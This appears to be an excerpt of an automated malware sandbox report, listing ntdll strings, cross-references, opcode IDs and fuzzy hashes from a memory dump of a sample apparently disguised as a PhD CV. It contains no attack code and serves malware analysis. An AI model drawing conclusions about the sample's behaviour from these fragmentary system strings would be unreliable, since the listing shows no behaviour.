                                                                                                  • LdrpCheckRedirection, xrefs: 00FC450F
                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FC4508
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 0-3154609507
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-2558761708
                                                                                                  Strings
                                                                                                  • LdrResSearchResource Enter, xrefs: 00F4A933
                                                                                                  • LdrResSearchResource Exit, xrefs: 00F4A945
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                  • API String ID: 0-4066393604
                                                                                                  Strings
                                                                                                  • , xrefs: 00FE2E38
                                                                                                  • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 00FE2B91
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                                  • API String ID: 0-4088147954
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Legacy$UEFI
                                                                                                  • API String ID: 2994545307-634100481
                                                                                                  Strings
                                                                                                  • LdrpResGetMappingSize Enter, xrefs: 00F4AB8A
                                                                                                  • LdrpResGetMappingSize Exit, xrefs: 00F4AB9C
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                                  • API String ID: 0-1497657909
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0$Flst
                                                                                                  • API String ID: 0-758220159
                                                                                                  Strings
                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F40586
                                                                                                  • kLsE, xrefs: 00F405FE
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                  • API String ID: 0-2547482624
                                                                                                  Strings
                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 00FB2616
                                                                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 00FB2611
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                                  • API String ID: 0-2104531740
                                                                                                  Strings
                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 00F4A229
                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 00F4A21B
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                  • API String ID: 0-2876891731
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: MUI
                                                                                                  • API String ID: 0-1339004836
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: w
                                                                                                  • API String ID: 0-476252946
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GlobalTags
                                                                                                  • API String ID: 0-1106856819
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #%u
                                                                                                  • API String ID: 0-232158463
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .mui
                                                                                                  • API String ID: 0-1199573805
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: EXT-
                                                                                                  • API String ID: 0-1948896318
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AlternateCodePage
                                                                                                  • API String ID: 0-3889302423
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PreferredUILanguages
                                                                                                  • API String ID: 0-1884656846
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryHash
                                                                                                  • API String ID: 0-2202222882
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: kLsE
                                                                                                  • API String ID: 0-3058123920
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: TrustedInstaller
                                                                                                  • API String ID: 0-565535830
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #
                                                                                                  • API String ID: 0-1885708031
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryName
                                                                                                  • API String ID: 0-215506332
                                                                                                  Strings
                                                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00FDAABF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                  • API String ID: 0-1911121157
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: WindowsExcludedProcs
                                                                                                  • API String ID: 0-3583428290
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrCreateEnclave
                                                                                                  • API String ID: 0-3262589265
                                                                                                  Strings
                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00FC85DE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                  • API String ID: 0-702105204
                                                                                                  Strings
                                                                                                  • Critical error detected %lx, xrefs: 00FF6BA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Critical error detected %lx
                                                                                                  • API String ID: 0-802127002
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: da9a268db7c12bc5c686d5e1760951cad988cec74a7c6e001bdddb997321b828
                                                                                                  • Instruction ID: 12909d420be252d4da4e2a012db469ea683968c93f50b797f81518c155a7ca98
                                                                                                  • Opcode Fuzzy Hash: da9a268db7c12bc5c686d5e1760951cad988cec74a7c6e001bdddb997321b828
                                                                                                  • Instruction Fuzzy Hash: 71C167746083818FD764CF18C894BABBBE4BF88354F44492DE98987291DB74E909DF92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3ce056bfdc0136064de3bcd8f4e7646553f319fba3945468c76983ad1e78cba
                                                                                                  • Instruction ID: eab4579b14e10c3734d66b0b1aad6805a9343076c8a7fe3dd9fdeb466fe85825
                                                                                                  • Opcode Fuzzy Hash: a3ce056bfdc0136064de3bcd8f4e7646553f319fba3945468c76983ad1e78cba
                                                                                                  • Instruction Fuzzy Hash: 83B1A270A002658BDB74DF58CC90BB9B3B5EF44720F0485EAE44AE7281EB74AD85DF60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7cafeeb6caf15c83a3e233e856d1454ea9be555d5478bcc68c56af7b571f6364
                                                                                                  • Instruction ID: 8d7a07094c6f95bdf37b970108f780a8b13b1d9ae9f676eb0d64ca6e75372b9a
                                                                                                  • Opcode Fuzzy Hash: 7cafeeb6caf15c83a3e233e856d1454ea9be555d5478bcc68c56af7b571f6364
                                                                                                  • Instruction Fuzzy Hash: 2FA12872E00215AFDB21DBA8CC48BEEB7B4AF05728F154125E911AF2D1D7789D08EBC1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 593cd3f27aa4bcaf2e280d90825016b9a1d653375600af9873f19a6bff881d3c
                                                                                                  • Instruction ID: da51a7a90ab53f18d2fc90ce53b55100bd67d69d34cc3d5c3eda93180d4ce69d
                                                                                                  • Opcode Fuzzy Hash: 593cd3f27aa4bcaf2e280d90825016b9a1d653375600af9873f19a6bff881d3c
                                                                                                  • Instruction Fuzzy Hash: AEA1F171B00606DFDB64EF65C881BEAB7B5FF44324F904029EA0997281DF78AC05EB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f65a5d3e11cc982dad19e28387fcc1210620ecf41a9425afb54502afddac1ca
                                                                                                  • Instruction ID: f4c3c0e6dffc032ccad0c307009d69b677166560e19273981f1d89b08c7997fe
                                                                                                  • Opcode Fuzzy Hash: 2f65a5d3e11cc982dad19e28387fcc1210620ecf41a9425afb54502afddac1ca
                                                                                                  • Instruction Fuzzy Hash: 8CA1EE72604601EFC722DF18C981B6ABBE9FF48704F444668F685DB666C738ED41CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e7c8f37f0e60cf4413d84ed92f4a155938613243fe7204cb3129df191ae509d0
                                                                                                  • Instruction ID: d846b529a3b135c8c4993b8fd90982a2356f7dae51b3660016eff4fe083c4854
                                                                                                  • Opcode Fuzzy Hash: e7c8f37f0e60cf4413d84ed92f4a155938613243fe7204cb3129df191ae509d0
                                                                                                  • Instruction Fuzzy Hash: B2917776E04620CBDB28DB28C880B7E77B5EF85722F15406AEE059B381D6389E05F761
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3333504dfd058f5d0a78b005f84f7259473ae11bb90e3c5a381dee494a0a1be9
                                                                                                  • Instruction ID: edf4f8ea0000861ad58983cec80e939657a3b6b87cf0dd7ebd1328d880e657fe
                                                                                                  • Opcode Fuzzy Hash: 3333504dfd058f5d0a78b005f84f7259473ae11bb90e3c5a381dee494a0a1be9
                                                                                                  • Instruction Fuzzy Hash: 5E8181B1E006199EEF14CF69C840ABEBBF9FB48714F10842EE455E7640E734E945DB94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                  • Instruction ID: 211d1c0855f62b328e58a98319ea39d1ce3eda5fb6cc56502cf78330762f9564
                                                                                                  • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                  • Instruction Fuzzy Hash: 82816135B00706DBEF5ACF58C880AAEB7F2BF84310F1581A9D95A9B385D774DA01CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bafa289e8673f1646d4acc33d28cc091d2640344f6b597f7ef80722337a60f2f
                                                                                                  • Instruction ID: ead2d77ff5e9a83406c98adfc7fad8f788bde5bdf14789bb86f7f3407c9f3d0e
                                                                                                  • Opcode Fuzzy Hash: bafa289e8673f1646d4acc33d28cc091d2640344f6b597f7ef80722337a60f2f
                                                                                                  • Instruction Fuzzy Hash: F7719272A086029BEF21DF59C881B6AB7E4FB84360F16492EF955C7200D774ED40EB92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ea3117f5f7e6427d1aec44eb965dc1e65ebefb2a1669aa7711721fb1322b55c8
                                                                                                  • Instruction ID: f933101ea5b3adad849e055f0a5353c4ecfa80c69d755bb340bff0995df317d1
                                                                                                  • Opcode Fuzzy Hash: ea3117f5f7e6427d1aec44eb965dc1e65ebefb2a1669aa7711721fb1322b55c8
                                                                                                  • Instruction Fuzzy Hash: 91815F71A00609EFDB15DFA5C880BEEB7F9FF88354F10842AE559A7250DB30AD45EB60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4fc5f7609d99e541f0b984742f98ecc596d16ef2ce482451fb0565cd9f7cb7fc
                                                                                                  • Instruction ID: 95dd376f152a313798bf57f204f5033275295a9e2e90156ac1510add6c8fccd3
                                                                                                  • Opcode Fuzzy Hash: 4fc5f7609d99e541f0b984742f98ecc596d16ef2ce482451fb0565cd9f7cb7fc
                                                                                                  • Instruction Fuzzy Hash: 1071D270904266AFCB14DF59C850AFEBBF6EF45340F48805AE894DB301E739EA46D7A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 85137f9d6d093fc02f96d700ef283b88e37fb6c2ed317052aaf8e4e526aae4c5
                                                                                                  • Instruction ID: 2b838a9b8368d027270da277c9d60edb7df6b26663fd2b5b7e828cf3f1418cb2
                                                                                                  • Opcode Fuzzy Hash: 85137f9d6d093fc02f96d700ef283b88e37fb6c2ed317052aaf8e4e526aae4c5
                                                                                                  • Instruction Fuzzy Hash: 6971F232A042418FC351DF28C880B26B7E4FF85711F0886A9F959CB352EB38DD49DB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 44dedb92dbe95ce3ccd6b5ea090fda58a7bc6ddfc651486003ac25bd0e3a7deb
                                                                                                  • Instruction ID: 3dcb4a17bb51bb3e579a3e155878b6026868ca8c995cd2de10fec7c5a8628f20
                                                                                                  • Opcode Fuzzy Hash: 44dedb92dbe95ce3ccd6b5ea090fda58a7bc6ddfc651486003ac25bd0e3a7deb
                                                                                                  • Instruction Fuzzy Hash: 8B81A172F04305DFCB24CF58D584BAEBBB5BF45320F19412AE900AB295DBB99D41EB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d71536b982ff2f30731d6c3ae34072e51e243d56ef5e0e63eeb2c26ba8f86fb7
                                                                                                  • Instruction ID: 5266644269713eb572233435d319d03cc37f5e8fb0d49b17723b0323933af1b2
                                                                                                  • Opcode Fuzzy Hash: d71536b982ff2f30731d6c3ae34072e51e243d56ef5e0e63eeb2c26ba8f86fb7
                                                                                                  • Instruction Fuzzy Hash: 9161A171E002059FCB18DF69C881BAEB7B9BF49354F20816EE515EB291DB34D902EF91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 47eab87d47ce8be864b56e4b030084784d808add0acaeca653143422634e689e
                                                                                                  • Instruction ID: dc8357e42f606bc2d68cd9e5b446d3ffc88c9c78228918f27b29f19b4b7883a5
                                                                                                  • Opcode Fuzzy Hash: 47eab87d47ce8be864b56e4b030084784d808add0acaeca653143422634e689e
                                                                                                  • Instruction Fuzzy Hash: 7361E371600716AFE716DF28C884BABBBE9FF44740F00861AF99987281DB30E914CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9252d73b967d95013880c54df05bc1f1d877d5414e08bc3eb863272dc5ad10e8
                                                                                                  • Instruction ID: 0ed9245cf6e208fba6254552d1e683ba926016a9d2c810a5293010bb0864731d
                                                                                                  • Opcode Fuzzy Hash: 9252d73b967d95013880c54df05bc1f1d877d5414e08bc3eb863272dc5ad10e8
                                                                                                  • Instruction Fuzzy Hash: 7A51B076600704EFDB30DF5AC884B6AB7E9FB55329F10092DE54287512C779E988EB40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  • Instruction ID: def0a39b234eddc3fba3b07dfe34286a55f6ded7498fc3873c5c8d3207e5b546
                                                                                                  • Opcode Fuzzy Hash: 589bce51f8c076cf01b51dde44d2d1556f2231c3f433b4f873840f46fcf73152
                                                                                                  • Instruction Fuzzy Hash: AB41AD72944204CFCB25DF68D8957AE77B4FF09320F180156E412BB3A5DB7A9900EFA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6f0b6fd7ec4f55fc2606e1189dd6b75e99e799b55c78c4be65a5f75db8548280
                                                                                                  • Instruction ID: 21f742726f74a43cb0eccb1cdf4f75748c5b5e06b493b81c1ed788b56b329b2e
                                                                                                  • Opcode Fuzzy Hash: 6f0b6fd7ec4f55fc2606e1189dd6b75e99e799b55c78c4be65a5f75db8548280
                                                                                                  • Instruction Fuzzy Hash: DE41F676A00201CFC725DF48C881B5E7BB5FB84754F28812AE9019B356CB7AD843EFA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f9981caa452302742e58999afe9420a14a2e00d288a123497da55e7099446cca
                                                                                                  • Instruction ID: 79d1435c5e7560e607451f45ae563067628ffaca1661946b0973fc6d13a9e085
                                                                                                  • Opcode Fuzzy Hash: f9981caa452302742e58999afe9420a14a2e00d288a123497da55e7099446cca
                                                                                                  • Instruction Fuzzy Hash: 3E419D325083069FE311DF68D941B6BB7E8EF84BA4F00092AF994D7151E734DE05AB93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0f3108b67d4c71bd4fe9b82cf51626b8d95fef595a2981e305c2735bd8919443
                                                                                                  • Instruction ID: d9f4c1c6ebdf0dea9e3eb8e4664706f93d9d0bc5e1dd030bb8e1104b8c954f80
                                                                                                  • Opcode Fuzzy Hash: 0f3108b67d4c71bd4fe9b82cf51626b8d95fef595a2981e305c2735bd8919443
                                                                                                  • Instruction Fuzzy Hash: 8F414D71904700EFD721DF18C841B26BBF4FF55324F24856AE9498B352EB75E942EB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                                  • Instruction ID: 29e5eac153a064c44550da504c7df59cf9437c2cf0cc06ff78bb30d3536a4160
                                                                                                  • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                                  • Instruction Fuzzy Hash: 7D417C71A00605EFCB24CF98C990AAAB7F5FF48710B20896EE55AE7250DB30FA14DF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: db1166e87d03fb2988a22c6c7550e0df31ab91ba57b6a6f2ec9a25b48c7bf930
                                                                                                  • Instruction ID: fbe1f107c66d161b11efe3cec21ac831bc826689a2ac534fb33926db7073ab96
                                                                                                  • Opcode Fuzzy Hash: db1166e87d03fb2988a22c6c7550e0df31ab91ba57b6a6f2ec9a25b48c7bf930
